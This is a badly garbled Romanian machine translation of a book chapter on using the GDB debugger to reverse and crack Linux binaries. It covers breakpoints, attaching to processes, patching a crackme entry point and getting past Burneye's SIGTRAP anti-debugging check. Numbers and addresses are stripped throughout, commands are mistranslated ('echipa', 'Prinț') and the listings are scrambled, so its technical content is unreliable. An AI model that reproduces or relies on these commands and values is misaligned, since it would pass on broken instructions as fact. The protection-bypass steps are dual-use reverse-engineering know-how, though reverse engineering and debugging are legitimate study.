atransmite programul de argumente, utilizați cheia args, urmată de numele fișierului depanat cu argumentelesale Rețineți că GDB încetează procesarea opțiunilor liniei de comandă găsind cheia -args, deci ar trebui să fieîntotdeauna indicată aceasta din urmă Listele de și arată liniile de comandă care arată încărcarea fișieruluiGDB-DEMO cu argumentele și, respectiv, fără ele Listarea Descărcați fișierul GDB-DEMO în debugger fără a indicaargumentele, enumerarea Descărcați fișierul GDB-DEMO în debugger cu #GDB -Q args GDB-Demo Arg Argn Debuggerultipărește invitația liniei de comandă ( GDB) și se așteaptă la echipele de intrare Dacă doriți, fișierul depanat poatefi încărcat direct de la debugger cu comanda fișier (lista ) Listarea Descărcați fișierul GDB-DEMO direct din#GDB -Q (GDB) Fișier GDB-DEMO Simboluri de citire de la GDB-Demo Done GDB are propria sa interfață graficăîncorporată cauzată de linia de comandă -tii Partea II Tehnicile de bază de hacking, notă, spre deosebire deSoftice, Turbo Debugger, Ollydbg și alți Windows-Layers, în GDB, programul după încărcare nu este pregătit pentru muncă', nu are context de registru și, prin urmare, comenzile de urmă Putem seta punctele de oprire în interiorul programului(dar nu și pe funcțiile bibliotecii), vizualizați/modifica memoria, dizassemble codul, etc De obicei, prima acțiunerezonabilă după încărcarea programului în debugger devine setarea punctului de oprire pe funcția principală (funcțiaprincipală a limbii c) sau funcția start - punctul de intrare la program Aceasta este realizată de adresa/numele TBcare stabilește punctul de oprire „One -timp”, după care puteți rula în siguranță comanda Tip (sau D) Debuggerul va„apărea” la punctul de oprire Procedura pentru instalarea unui punct de oprire pe funcția principală este prezentată înlista : Listarea Instalarea punctului de oprire pe principalul #GDB -Q GDB-DEMO (GDB) TB TB Breakpoint Main la x (GDB) r Program de pornire:/Home/KPNC/GDB/GDB-DEMO x în Main () Fișierele executabile fărăsimbolic Informații fără informații simbolice dacă nu există informații simbolice (de exemplu, acestea au fost tăiate decătre utilitatea benzilor, așa cum este foarte des), apoi instalarea punctelor de oprire pe start/principal devineimposibilă și trebuie să indicăm adresa „fizică” a punctului de intrare Puteți obține adresa fizică a punctului deintrare, de exemplu, folosind utilitatea objdump lansată cu cheia -f (lista ) Listarea Procedura de procesare aprogramului pentru un program cu un simbolic #STNP GDB-DEMO #OBJDUM -F GDB-DEEMO GDB-DEMO: O: , Exec P, Has Syms,D PAGED Arhitectură: , steaguri x : EXEC P, HAS SYMS, D PAGED Adresa de pornire x # GDB -Q GDB -Demo (nu sunt găsite simboluri dedepanare) (GDB) B funcția principală „principală” nu este definită Faceți punctul de întrerupere pendinte peviitoarea încărcare a bibliotecii partajate?(y sau [n]) n # l O încercare de instalare a unui punct de oprire pe funcțiaprincipală nu a reușit să fie #, deoarece informațiile simbolice nu sunt disponibile # Debuggerul a sugerat setareapunctului de oprire ulterior, # Când sunt disponibile informații simbolice;# Cu toate acestea, această propunere a fostrespinsă, deoarece # informațiile datoriei nu vor fi niciodată disponibile (GDB) TB * x Breakpoint la x GPAV Caracteristici de depanare în UNIX și Linux # L, setarea punctului de oprire la adresa fizică a avutsucces (GDB) G Program de pornire:/Home/KPNC/GDB/GDB-DEMO (nu au fost găsite simboluri de depanare) x în??() Conexiune la un proces deja rulat, dacă procesul care trebuie depanat este deja lansat, vă puteți conecta la acestafie indicând identificatorul său împreună cu tasta -PID de pe linia de comandă, fie folosind comanda Atașă, direct dinDebugger în sine Vă puteți deconecta de la proces prin comanda Detach (lansată fără argumente) sau lăsând debuggerul lacomanda de renunțare (sau q) După deconectare, procesul își continuă activitatea în modul normal și, dacă trebuie să -lfinalizați, echipa Kill vine la salvare Procedura de conectare la procesul de lucru folosind linia de comandă estedemonstrată în lista #PS -A PID TTY TIME CMD PTS/ : GDB DEMO PTS/ : PS # GDB -P -QID ATACHING LA PROCESUL Simboluri de citire din/acasă/kpnc/gdb/gdb demo Citirea simbolurilor de la/lib/libc so done Citind simboluri din /lib/ld-linux so done x f ab în citire () din^Listarea DivinProcesul Kranechitz al debuggerului folosind atașarea #GDB -Q (GDB) Atașat Atașarea la procesul Simboluri decitire /home/kpnc/gdb demo done Citirea simbolurilor de la /lib/libc so done Citind simboluri din /lib/ld-linux so done x f ab în citire () dinUn exemplu de astfel de fișier poate fi găsit aici:http://www crackmes de/users/yanisto/tiny crackme/ Cum să ieși din situație?Dă un fișier ELF ZacyClim în punctul deintrare, pornește execuția acestuia și conectează -te la procesul comenzii atașat (sau de la linia de comandă: GDB-Identificator -PID) După ce debuggerul „apare”, puteți restabili octeți originali și puteți continua să urmărească înmodul normal Vom arăta cum să -l punem în practică Partea a II -a Tehnici de bază de hacking fig Blocândprogramul folosind Hiew, încărcăm fișierul minuscul-crackme în orice editor Hex (de exemplu, în NT sau HIEW), mergem lapunctul de intrare În Hiew, acest lucru este realizat apăsând (pentru a merge la modul hex), [antet], [intrare] Ne amintim (scriem pe o bucată de hârtie) conținutul a doi octeți sub cursor (în cazul nostru, acestea suntegale cu B H AH) și le înlocuim cu EBH FEH, care corespunde instrucțiunilor JWNPS $ (Fig ) Salvăm modificările,pornim fișierul, îl definim PID, conectăm debuggerul la proces De data aceasta, GDB, deși jură în format greșit, dartotuși se conectează la proces, oferindu -ne o libertate completă de acțiune Dar înainte de a începe urmărirea, estenecesar să restabiliți fișierul în starea inițială Modificarea memoriei (registre și variabile) este realizată decomanda set, care în acest caz se numește așa cum se arată în lista ;octeți sursă * • /tiny-crackme # Lansareafișierului buclă minusculă-crackme și trecerea la consola adiacentă # ps -a pid tty pts/ pts/ time : : : CMD Tiny-Crackme PS # GDB - Q (GDB) Atașat Atașarea la procesul "/home/kpnc/gdb/tiny-crackme": nu înformat executabil: format de fișier necunoscut # l GDB raportează un format de fișier incorect;# Cu toate acestea, nurefuză să se conecteze la proces (Gdb) set *(nesemnat char *) $ pc = ohvz (gdb) set *(char nesemnat *) ($ pc+l) = x a #l restaurați fișierul folosind comanda set Aici $ RS (luând în considerare registrul)-simbolul registrului de acțiune acomenzilor (numărul de programe), a * (nesemnat char *)-o transformare clară a tipului, fără de care GDB nu poatedetermina niciodată dimensiunea a celulei înregistrate Un design destul de lung, astfel încât dorința de a -l reduce vafi destul de naturală Debuggerul își amintește de istoria echipelor și, pentru a nu introduce deja introdus Comanda, trebuie doar să apăsați tasta și să editați linia În cazul analizat - înlocuiți $ RS = OHBZ cu ($ RS+ ) = x a Deja mai scurt!Dar încă lung Capitolul Caracteristici de depanare în UNIX și Linux Notă În mod implicit,GDB nu salvează istoricul comenzilor și este valabil doar într -o sesiune pentru a utiliza economisirea automată,trebuie să introduceți setul de salvare a OP Faceți acest lucru cu fiecare lansare GDB, puteți aduce această secvență înfișierul GDBINIT, situat în catalogul /acasă sau în catalogul actual, este necesar să subliniem unul dintre principaleleavantaje ale GDB în fața Softice Debuggerul GDB are capacități de expansiune nelimitate și susține un interpret avansat,care permite, printre altele, să -și declare variabilele începând cu semnul $ Ulterior, aceste variabile pot fimanipulate la propria lor discreție O versiune îmbunătățită a procedurii este prezentată în lista Listarea Restaurarea conținutului inițial al celulelor de memorie modificate folosind un set variabil $ I (GDB) $ I = $ RS(GDB) set *(Char nesemnat *) $ I ++ = xb (GDB) Set *(Char nesemnat *) $ i ++ = x a aici după introducerea comenziiset * * (nesemnat char *) $ i ++ = ohvz facem clic pe tasta și doar schimbăm OKVZ la x A (o variabilă $ I creșteautomat) Această metodă este mult mai scurtă, dar, cu toate acestea, există încă rezerve Și să anunțăm propria noastrăechipă de utilizator!Acest lucru se face folosind comanda Deține și, în cazul nostru, arată așa cum se arată în lista Listarea Anunțul de comandă a utilizatorului (DD) pentru a înregistra octeții de pe specificarea (GDB)Definiți comanda de tip DD pentru definiția „DD” Încheiați -vă cu o linie care spune doar „sfârșit” > set *(Charnesemnat *) $ argo = $ argl> final Acordați atenția modului în care GDB a schimbat tipul de invitație (>) când a începutdeterminarea echipei!După ce a terminat intrarea, dați comanda finală și noua echipă este adăugată la memoria GDBîmpreună cu toți ceilalți Ea acceptă două argumente: - $ Argo - Adresa țintă și Byte înregistrate $ Acum, pentru arestabili octeții la punctul de intrare, este suficient pentru a da o secvență de comenzi date în lista Notă Dacăintroduceți comanda DD $ RS ++ OHVZ, atunci după executarea comenzii, registrul $ RS va crește cu unul, care nu esteinclus în planurile noastre de listare Restaurarea conținutului inițial al celulelor de memorie folosind o comandăde utilizator (GDB) setează $ i = $ RS (GDB) DD $ I ++ OHBZ (GDB) DD $ I ++ x A Echipele de utilizator există doar peparcursul sesiunii curente și când Părăsind GDB, sunt distruse Acest lucru este rău, dar situația poate fi corectatăprin aducerea lor la fișierul de comandă afișat în lista Partea a II -a Tehnici de hacking de bază Listarea L Fișier de comandă care conține definiția DD De Fine DD set *(Char nesemnat *) $ argo = Sargl End Încărcareafișierului de comandă în memorie este realizat de sursa name file (de exemplu, sursa n k cmd) În același timp, deoareceGDB acceptă elevarea automată de intrare (caracteristică aproape toate programele UNIX), este complet opțional săintroducem numele complet al echipei sursă Este suficient să apelați astfel și să apăsați Debuggerul adaugă în modindependent restul Dacă există mai multe comenzi începând cu SO, atunci în loc de alegeri automate, se va auzi oscârțâie vagă, semnalând ambiguitatea Apăsarea repetată duce la încheierea tuturor opțiunilor posibile Creareapropriilor comenzi (încărcate din fișierul gdbinit sau manual), nu numai că vă oferiți condiții de muncă confortabile,dar și creșteți productivitatea muncii!Astfel, cei care se plâng de inconvenientul GDB pur și simplu nu știu cum să -lregleze corect Continuăm să urmărim, spre deosebire de Softice (și chiar de la Debug com!), GDB nu arată mnemonice deinstrucțiuni ale mașinii atunci când urmează dacă nu sunt întrebați despre asta Acest lucru îi confundă foarte mult peîncepători, dar ideologic mult mai corect Puteți afișa o comandă a mașinii la o adresă arbitrară folosind o comandă aadresei X/I, așa cum se arată în lista (GDB) X/I x x : JMP x În loc de adresă, puteți utilizaorice altă expresie, variabilă sau înregistrare (dacă registrele sunt disponibile) Cu toate acestea, depanareaprogramului în acest mod este extrem de incomodă Prin urmare, este mult mai bine să utilizați modul de afișare automatăsetat de comanda de afișare Modul de afișare automată vă permite să afișați valoarea oricărei expresii, înregistrare,celule de memorie, instrucțiuni ale mașinii la fiecare oprire GDB (de exemplu, cu execuție cu pas cu pas) Echipa deafișare/ USD (care este suficient pentru a da o dată în întreaga sesiune), va afișa instrucțiunile mașinii perând Acest lucru nu este foarte convenabil și, în practică, este constant necesar pentru a afla ce instrucțiune va urmacei executați Script dat în listare afișează trei instrucțiuni simultan: afișare/zi $ Rs = Listarea Afișare automată a instrucțiunilor ( instrucțiuni de dată), urmărirea în format AT&T - (GDB) Afișare/zi $ RS : X/ZI $ $ x : MOV $ A, %S x A:JMP x x F: Adăugați %al , ( %edx) (GDB) NI x A în ??() : x/zi $ PC x A: JNP x x F:Adăugare %Al, ( %EDX) x : Adăugați %Al, ( %EBX) (GDB) Ni GPAVA Caracteristici de debugging în UNIX și Linux x IP IP IP ??() : Х/ $рс x : jmp x x : mov $ xe ,%al x : movsl%ds:(%esi),%es:(%edi) Для автоматического отображения значений регистров достаточно дать команду display регистр, Undeeste registrul-$ eax, $ ebx, $ esh, etc Pentru registrul poziției actuale a stivei, există un nume special-$ SP, carepoate fi utilizat la egalitate cu $ esp (la fel ca $ RS $ eir) Puteți crea orice număr de afișare automată șioricare dintre ele poate fi întotdeauna șters de comanda NI P Unsplay PP, unde PC -ul este numărul de afișare carepoate fi găsit folosind comanda de afișare Info Echipa de Disable Display N PP ajută la afișarea afișajului, iarechipa Activare afișare reapare afișarea deconectată Comutarea între AT&T și Intel Dizassation, GDB folosește AT&T, darpoate afișa instrucțiuni în format Intel Pentru Intel Trecerea la format Intel este suficientă pentru a da comandaIntel a setului de dezasidare a aromei și pentru a reveni la formatul AT&T-comanda ATT-ul ATT-Flavor de dezasidare Săne uităm la exemplul prezentat în lista (GDB) Set Demontare Intel-Flavor Intel/ PC : X/ $ PC x : MOVBL, x A x A: JMP x x F: Adăugare byte ptr [EDX], Al (GDB) NI x A în ?? () : X/ $ PC x A: JMP x x F: Adăugare byte ptr [EDX], AL x : Add Byte PTR [EBX], AL (GDB) x în ??() : X/ $ PC x : JMP x x : Mov AL AL , xe x : movs es: movs es: movs es: movs es: movs es:movs es: movs es: movs es: movs es: movs es: movs es [edi], ds: [ESI] Redirecția de intrare/ieșire În mod implicit, GDBconectează consola curentă cu intrarea/ieșirea standard a programului depanat, ca urmare a faptului că mesajeleprogramului sunt amestecate cu mesajele de depanare Pentru a pune lucrurile în ordine, este necesar să redirecționațiintrarea și ieșirea programului într -o consolă separată, care este realizată de comanda TTY Console Deschideți o nouăconsolă, dați echipei TTY UNIX pentru a -și determina numele (de exemplu,/dev/ps/b), reveniți la debugger și dațicomanda TTY/DEV/PS/B Concluzia expresiilor Pentru a afișa expresia pe ecran, se folosește comanda principale (sau p),urmată de expresia necesară (lista ) Partea a II -a Tehnici de hacker de bază Listarea Demonstrareacapacităților echipei PRINț (GDB) P * $ = (GDB) P $ + $ = (GDB) P $ SP $ = (void *) xbfffb # Valoarede ieșire $ sp (GDB) P/X * (nesemnat Mt *) $ sp $ = x # Ieșirea celulei indicate de $ sp este în formathexadecimal (GDB) P/U * (nesemnat Mt *) $ sp $ = # Ieșirea celulei indicate de $ zr se află într -un format zecimalnesfârșit (GDB) P * xBFFFFB F $ = # Concluzia celulei CO -SHAPED în format zecimal (implicit) (GDB) P/X * xBFFFB F$ = x # Ieșirea conținutului celulei în format hexadecimal După cum puteți vedea, la fiecare ieșire, echipa Prințcreează o variabilă care poate fi utilizată în expresiile ulterioare, ceea ce este foarte convenabil În plus, estedisponibilă funcția Printțf cu un set standard de specificatori, care este deosebit de convenabil în fișierele decomandă De exemplu: „printf” %x %x %x \ n ”, $ eax, $ ebx, $ hed”, afișează valorile trei registre simultan Acordațiatenție lipsei parantezelor rotunde!Distribuția în tehnica și filozofia GDB va continua imersiunea noastră în tehnica șifilozofia GDB, explorând capacitățile sale din punctul de vedere al unui hacker care depanează fișierele binare fărătextele originale În această secțiune, vom lua în considerare tehnica schimbării fluxului programului, a punctelor deoprire și de observare, mecanisme de urmărire și instrumente de memorie - în general, tot ceea ce face ca biscuiti săfie fericiți oameni fericiți Modificarea fluxului de execuție, încărcat cu comanda de fișier (sau indicată pe linia decomandă), se află în starea amorfă și este doar un set de octeți înregistrați în alocarea în regiunea spațiului deadrese Noul proces nu a fost încă creat pentru ea și este imposibil de urmărit În orice caz, urmărirea este imposibilăpână când dăm comanda de rulare (sau G), care este de obicei precedată de instalarea punctului de oprire pe funcțiaprincipală sau start Fiind în funcțiune, programul va funcționa până când va îndeplini punctul de oprire sau până cândva primi o Opriți -vă (a se vedea „procesarea semnalului” SEPA în acest capitol) Utilizarea comenzii de rulare la un program dejaavansat va duce la repornirea sa (în configurația utilizată în mod implicit, debugger solicită confirmarea) Putețicontinua să lucrați un program oprit la un punct de oprire sau la un semnal, comanda continuă (prescurtată c), careacționează în același mod ca rularea (adică, lucrând la un punct de oprire sau la semnal) Pentru a transfera controlulla o adresă arbitrară, trebuie să efectuați Jump (O), urmat de o adresă, nume de funcție sau înregistrare În special,echipa J * $ Rs în acțiunea sa de GPAV caracteristici de depanare în UNIX și Linux este similară cu echipacontinuă, comanda J Foo transferă controlul la Lamine/Funcția Foo (dacă este prezent în Tabel de simboluri) și comanda o* x aa - efectuează tranziția la adresa aah Dacă aceleași adrese sunt utilizate în mod repetat, ele pot fiaduse în variabila utilizatorului prin comanda set $ my foo = x aa, apoi o utilizați ca parametrul de comandă OSHPR- J *$ MY FOO Apropo, rețineți că debuggerul Softice nu oferă astfel de oportunități Echipa de până când echipa continuăsă execute programul până la adresa specificată (de exemplu, u * x ED), la atingerea care oprește și transferăcontrolul către debugger La fel ca Jump, până când echipa până la acceptarea lucrează nu numai cu mărci și adrese, ci șicu variabile, ceea ce simplifică foarte mult hackingul Dacă echipa de până când este utilizată fără argumente, aceastaeste similară cu echipa Nexti - în acest caz, aceasta merge la următoarea comandă a mașinii, lipsind funcțiile șiciclurile Luați în considerare codul prezentat în lista Listarea Fragment al ciclului ”care demonstreazăesența echipei până la Text: , b Text: ED JMP Text: EF LEA SCURT LOC EF Short LOC EAX,[EBP + VAR ];-> la ieșire din ciclu, - -> până la începutul corpului ciclului;Prima echipă din spatele sfârșituluiciclului, dacă este pe linia ebh, dați comanda până când este echivalentă cu u * x EF) - apoi echipa efectueazăciclul și transferă controlul debuggerului numai la ieșirea din acest ciclu Foarte confortabil!Dacă trebuie să așteptămieșirea din funcție, opriți automat la întâlnirea cu RET - pentru acest caz, comanda de finisare este furnizată,similară cu comanda RET debugger Softice În loc de trasatorul de pas cu pas al programului, GDB răsfoind cadrul funcțieianterioare (care poate fi realizat de comanda BackTrace sau BT și stabilește punctul de oprire la adresa de retur, careoferă o eficiență maximă a performanței Cu toate acestea, dacă debuggerul nu este în măsură să promoveze stiva și sărestaureze lanțul de cadre, atunci echipa de finisare refuză să lucreze Echipa de întoarcere, spre deosebire de finisaj,duce la o revenire timpurie la funcția maternă, fără a îndeplini partea rămasă a funcției cauzate Softice nu oferă oastfel de oportunitate, ci păcat!Echipa de întoarcere este foarte utilă și apare adesea nevoia Softice nu știe, deasemenea, să apeleze la funcții, iar GDB o face cu ușurință cu comanda CAII, care urmează funcția/variabila/registrulsau adresa Argumentele (dacă există) sunt transmise în paranteze rotunde în conformitate cu acordul C, adică suntintroduse în fibră de la dreapta la stânga Rushing Out argumentele de la Stack este realizată de aceeași echipă CAII Deexemplu: CAII Foo ( , , ) sau CAII x ( ) Dacă doriți, puteți chiar executa comanda shell -ului fără a părăsidebuggerul Acest lucru se face astfel: Shell LS sau Shell Man Opo Doar fantastic de convenabil!Cu toate acestea, unrezultat similar poate fi obținut prin deschiderea unei console suplimentare Deoarece GDB este un depanator la nivelaplicat, acesta, spre deosebire de Softice, nu îngheță sistemul, permițându -vă să utilizați multitasking natural fără operversiune cu Shell Urmărirea cu urmărirea este conectată doar două echipe: Stei N (Si P) efectuează următoareleinstrucțiuni cu intrarea ciclurilor și funcțiilor, și Nexti N (Ni P) - fără apusul soarelui Când începeți fărăargumente, se realizează o singură instrucțiune Apăsând pe repetă automat ultima comandă (Stei sau Nexti), careaccelerează semnificativ urmărirea (apropo, apăsarea tastei este mult mai convenabilă decât oricare dintretastele funcționale utilizate pentru a urmări Windows-Layers) Partea a II -a Tehnicile de bază ale hackerității suntnota echipei Pasul N/Next P, a cărui mențiune poate fi găsită în documentația de pe GDB, sunt concentrate pe lucrul cutextele sursă și efectuează rânduri și în absența informațiilor simbolice Acestea urmăresc programul până la finalizareaacestuia, ceea ce nu este bun Un exemplu de sesiune de urmărire este prezentat în Fig Orez Un exemplu de urmă apunctului de oprire al depangerului GDB acceptă două tipuri de opriri: actele opririi (punctele de întrerupere), careopresc codul și punctul de observare (punctele de veghe), care opresc datele care se referă la datele Notă, cu excepția Punctele punctelor de oprire și observație, GDB acceptă punctele de execuție , dar sunt aproape inutile pentru a depanaprograme fără texte inițiale Punctele de oprire pot fi fie software și hardware Punctul software pentru execuție peplatforma X este o instrucțiune CCH cu un singur CCH (YT H), iar punctele de observare a software -ului suntimplementate în funcție de pas -pas -pas al programului cu urmărirea apelurilor către celula care vă interesează Trebuieremarcat aici, în primul rând, este extrem de neproductiv, iar în al doilea rând programele, pur și simplu nu permit puncte de interceptare-acesta este un alt punct de oprire specializat care vă oprește programul atunci când are loc uneveniment de un anumit tip, cum ar fi aruncarea unei excepții În limbi la nivel înalt, cu procesare de excepție (deexemplu, GNU C ++) sau descărcarea unei biblioteci CPAVA Caracteristici de depanare în UNIX și Linux urmărește-te Există doar patru puncte hardware pe platforma X , în timp ce puteți instala software cât doriți Punctul softwarepentru execuție este setat de comanda Break (B), care urmează numele funcției/adresei/registrului sau variabilei Deexemplu: b Main, b * x vs Comanda tbreak (TB) stabilește punctul de unică folosință al opririi, care este eliminatautomat atunci când este declanșat Punctul hardware al opririi este stabilit de comanda HBreak (HB), iar hardware -ultemporar - thbreak (THB) După instalarea punctului hardware al opririi, debuggerul afișează punctul de întrerupereasistat hardware N la adresă (Fig ) Totuși, acest lucru nu înseamnă că operațiunea s -a încheiat cu succes Pentruverificare, puteți instala cel puțin o mie de puncte hardware ale opririi și totul va fi OK, dar numai atunci cândîncepeți programul prin rulare sau Continuă comenzile pot spune: Avertisment: Nu se poate introduce punctul deîntrerupere hardware W (cm Fig ) Orez Instalarea reală a punctelor de oprire are loc numai la începutulprogramului, punctele hardware pentru înregistrarea celulei sunt stabilite de comanda Watch (WA), comenzile RWatch (RW)și AWCH (AW) setează citirea și Puncte de citire/înregistrare, respectiv Iată un exemplu tipic de instalare a unui punctde observație hardware: RW * xbfffFA Vă rugăm să rețineți că echipa RW *$ ESP nu mai este declanșată, iar debuggerulraportează atenția la Dereference un indicator generic Ca și în cazul opririi punctelor de execuție, mesajul devizionare Hardware Citește N: Adresa nu înseamnă absolut nimic, iar atunci când încearcă să lanseze/să continue execuțiaprogramului, debuggerul poate afișa mesajul: nu a putut hardware Watchpoint N Toate punctele de observare/oprire pot ficondiționate, adică să funcționeze numai dacă valoarea expresiei care stă după IF este adevărată De exemplu: b dacă $eax == sau rw* xbffffA if (*((nesemnat int*) $ esp)! = x ) La instalarea oricărui punct de observație/oprire,debuggerul îi atribuie numărul (lista ), care, în primul rând, este afișat atunci când este declanșat și, în aldoilea rând, se pot utiliza partea II Tehnicile de bază de hacking în echipele de comandă și stop de control Numărulultimului punct de oprire oprit este introdus automat în variabila $ bpnum Listarea Când instalați un punct deobservație/opritor, debuggerul își atribuie automat propriul număr (în acest caz egal cu Unity) (GDB) HB HB Hardwareprincipal asistat de hardware la x EF (GDB) r Program de pornire:/Home/GDB/GDB DEMO BreakaPoint x EFEFEEFÎn Main () Comanda Ignore N X stabilește contorul de ignorare a punctului P de observație/opritor, sărind primele Xoperații, care este util în special în cicluri Dacă atunci când punctul de oprire/observare este declanșat, este necesarsă efectuați o anumită secvență de operații, puteți utiliza comanda comenzilor P, unde p este numărul punctului deobservație/stop Un exemplu de utilizare a acestei comenzi este dat în lista În exemplul dat, când punctul estedeclanșat, salutul va fi afișat Hello, World "Listarea Canvas automat Iimushibia comenzilor atunci cânddeclanșează printf" Hello, WorldXn "se termină va ajuta Enfo Break)) Când începeți fără argumente, această echipă vaafișa informații despre starea tuturor punctelor de observație/ oprire Dacă trebuie să verificați punctul deobservație/ oprirea specifică, este suficient să indicați numărul acestuia De exemplu, în lista , un exemplu deIeșirea informațiilor despre punctul de observație numărul LISTARE Vizualizarea informațiilor despre punctulde supraveghere (GDB) B Num Round Disp Enb Adresa Citiți punctul de veghe păstrați -vă doar dacă $ eax == (GDB) Ce * Comanda clară (este ștersă) este utilizată pentru a elimina punctele de observare/oprire Cândîncepeți fără argumente, această echipă elimină toate punctele (în timp ce depanatorul solicită confirmarea) Dacă estenecesar Ștergeți un singur punct specific - trebuie doar să setați numărul său, de exemplu: Ștergeți În plus, GDB vă permitesă eliminați o gamă întreagă de opriri/puncte de observare De exemplu, echipa Șterge - elimină punctele de observațiede la prima la a șasea incluzivă Nota atunci când eliminați gama de puncte de oprire/observație nu solicită nicioconfirmare, deci fiți comanda de activare și dezactivare la alertă pentru a activa temporar/deconectasupravegherea/oprirea și a avea aceeași sintaxă ca și echipa de ștergere CPAVA Caracteristicile de depanare în UNIXși Linux lucrează cu memoria și registrele memoriei de dump pentru hackeri sunt sfinte Nici un singur hack nu poateface fără el Puteți vizualiza/ modifica memoria în moduri diferite De exemplu, acest lucru se poate face folosindcomanda PNNT/PNNTF (lista ) Listarea Citirea și modificarea memoriei folosind comanda r (Prinț) (GDB) P $ ESP #ieșirea conținutului ESP $ = (void *) xbfffa (GDB) P (char) $ ESP # ieșire a registrului de octeți mai tânăr ESP $ = 'P *(GDB) P * x EF # Ieșirea conținutului cuvântului dublu în # Decimal Format iconic $ = - (GDB)R/X * x EF # ieșirea conținutului dublei cuvânt în $ = xb f e (gdb) p/u * x ef # *) x (gdb) r/x *(((char*) x ) = x # Alocarea valorii de H octeți este de $ = x # Adresa H, cu toate acestea, atuncicând vizualizați un număr mare de celule de memorie, este mai profitabil Pentru a utiliza o comandă specială X care văpermite să setați lungimea blocului de memorie afișat Un exemplu de utilizare a acestei comenzi este dat în lista Listarea Afișarea gropii programului folosind X (GDB) X/ x $ PC # Vizualizarea cuvinte duble;в hex виде,начиная от $pc x ef : xb f e x x c c x x ff : xffbfe x dffff x xfffeb e x f : x c c ff x x x x f : xe xf x CEC OXOOOOOOOOOOES(GDB) X/ XB $ PC # VIZITĂ BYTE Cuvinte în hex-vida, începând de la $ PC x ef : x xe Oxfo x x f : x x x x x Hackers care începe Calea de viață cu GDB, această formă de prezentare ainformațiilor poate fi aranjată, dar va părea utilizatori prea risipitori la Softice Ar fi frumos să obțineți o groapăhexadecimală clasică și acest lucru se poate face cu adevărat!Este suficient să creăm implementarea echipei deutilizator (numiți -o DDD) care afișează groapa folosind funcția Prințf Spre deosebire de Softice, depanatorul GDB seextinde la nesfârșit Prin urmare, dacă ceva nu se obosește de noi, este aproape întotdeauna posibil să -l refaceți pegustul vostru Codul sursă al comenzii DDD este prezentat în lista ;Listarea Codul sursă al comenzii deutilizator DDD, care afișează depozitul în stilul softice și debugger turbo definește DDD $ ddd p = printf "% xh:", $arg partea a II -a Tehnicile de bază ale timpului $ ddd p ++ (în GDB corespunde unei repetăria unei repetări a unei repetări a Ultima echipă) - următorul octet de ore, etc În același timp, argumentul transmisechipei este utilizat pentru a stoca ultima adresă afișată Apelarea DDD $ ESP va duce la faptul că registrul $ ESP va ficrescut cu ore, că programul se strică Desigur, dacă doriți, puteți rescrie comanda DDD, astfel încât să nu aibăefecte secundare și să nu afișeze H octeți de memorie, ci exact atât cât va fi indicat Procesarea semnaluluisemnalului se numește un eveniment asincron care are loc în program și o oarecum reminiscentă de excepțiile structuralede la Windows Semnalele sunt împărțite în fatale și nu fatale Un exemplu de semnal non -fatal este Sigalrm, excitatatunci când este declanșat cronometrul de intervale Dar cu Încălcările de acces la memorie generează un semnal SIGSEGV, care finalizează programul în modul de urgență (cu excepțiacazului în care programatorul a furnizat un manipulator special) Debuggerul GDB interceptează toate semnalele În funcțiede configurația sa, el transferă semnalul la program, fie îl „absoarbe”, prefăcându -se că nu se întâmplă nimicinteresant Puteți vizualiza configurația GDB curentă folosind comanda de semnale Info (aka Handle Info) Rezultatulvizualizării reacției de debugger la semnale este prezentat în Fig Pentru a schimba reacția GDB, trebuie săutilizați comportamentul de comandă de mâner, unde semnalul este numele semnalului (de exemplu, sigsegv), iarcomportamentul este reacția de debugger la apariția semnalului Următoarele cuvinte cheie sunt utilizate pentru a descriereacția de debugger la semnale: □ Nostop - Când este primit acest semnal, GDB nu oprește programul, dar poate afișa unmesaj despre acesta pe ecran □ Opriți - Când acest semnal este primit, GDB oprește programul Acest cuvânt cheie implică,de asemenea, cuvântul cheie Printț □ PNNT - La primirea acestui semnal, GDB afișează un mesaj despre acesta pe ecran □NOPRINT - GDB nu informează despre acest semnal Acest cuvânt cheie implică, de asemenea, cuvântul cheie al Nostop □ PASS- GDB permite programului să vadă acest semnal Programul depanat poate prelucra acest semnal Dacă semnalul este fatal,programul poate finaliza execuția □ NOPASS - GDB nu permite programului să vadă semnalul GPAVA Caracteristici dedepanare UNIX și Linux Fig Vizualizați reacția de debugger GDB la diverse semnale ale unor semnale (de exemplu,semnalul SIGTRAP care rezultă atunci când este atins programul) Rezervele de depanare pentru propriile nevoi Aceastăcircumstanță este folosită de multe programe sigure care determină dacă sunt sub depanare sau nu Și -au setat propriulhandler Sigtrap, apoi urmează instrucțiunea INTA H Atunci când efectuați fără GDB, manipulatorul primește control,altfel semnalul este absorbit de debuggerul și controlul procesorului nu mai este transmis În special, fișiereleambalate de banda Bumeye conțin codul prezentat în lista х а : mov х ас: mov OxO bl:mov x b : mov x b : int x ba: add x c : mov x c : int x c :cmpl x ce: jne $ x ,%ebx $ x a c,%ecx $ x ,%edx %edx,%eax x $ x a Tehnici de bază de hackingfig O încercare de depanare a programului protejat de banda Burneye cu o reacție standard la semnale (configurațieimplicită) se încheie cu o defecțiune completă a Fig Transmiterea semnalului Sigtrap este înșelătoare în apărare,iar depanarea este cu succes CPAVA Caracteristicile depanicării în UNIX și Linux încearcă să debugteze un astfelde program în modul normal duce la prăbușirea acestuia (Fig ), cu excepția cazului în care, cu excepția cazului încare, desigur , în momentul excitației semnalului, este excitat să nu crească conținutul celulei sunt h peunitate Dar există un mod mult mai simplu și mai elegant de a ocoli această protecție După ce am așteptat „Blestemul”debuggerului despre semnalul Sigtrap, oferim comanda Handle Sigtrap Pass și transferim comanda continuă în program Șitotul va funcționa ca un ceas (Fig )!Concluzia, astfel încât am făcut cunoștință cu capacitățile de bază aledepanatorului puternic GDB Cu toate acestea, aceasta este doar o mică parte din ceea ce este capabil Orice altceva esteconținut în documentația standard și textele inițiale (documentația, ca de obicei, conține multe omisiuni) Cu toateacestea, pentru majoritatea sarcinilor de hacker pe care le -am luat în considerare, echipele pe care le considerăm căvor fi destul de mari În plus, multe informații utile pot fi obținute din următoarele surse: □ „Debugging folosind GDB”(http://www linux org ru/books/gnu/gdb/gdb-rru pdf) documentație-solid pentru GDB (in rusa) □ Internet GDB(http://gnuarm org/pdf/gdbint pdf) - Un ghid excelent care descrie lumea internă GDB (în engleză) Ajută excelent înfinalizarea textelor sursă □ „Procesul de urmărire folosind PTRACE” (http://linuxgazette net/issue /sandeeep html) - Unarticol despre Trace sub Linux, cu exemple de cel mai simplu tracer (în engleză) Rețineți că sub FreeBSD totul estediferit □ "Bug-uri de ghemuire la sursă (http://www linux-mag com/ - /code html)-a un articol despre căutareaerorilor în etapele incipiente ale analizei codului sursă (în engleză) Va trebui să obțineți un articol Înregistrați-vă pe site 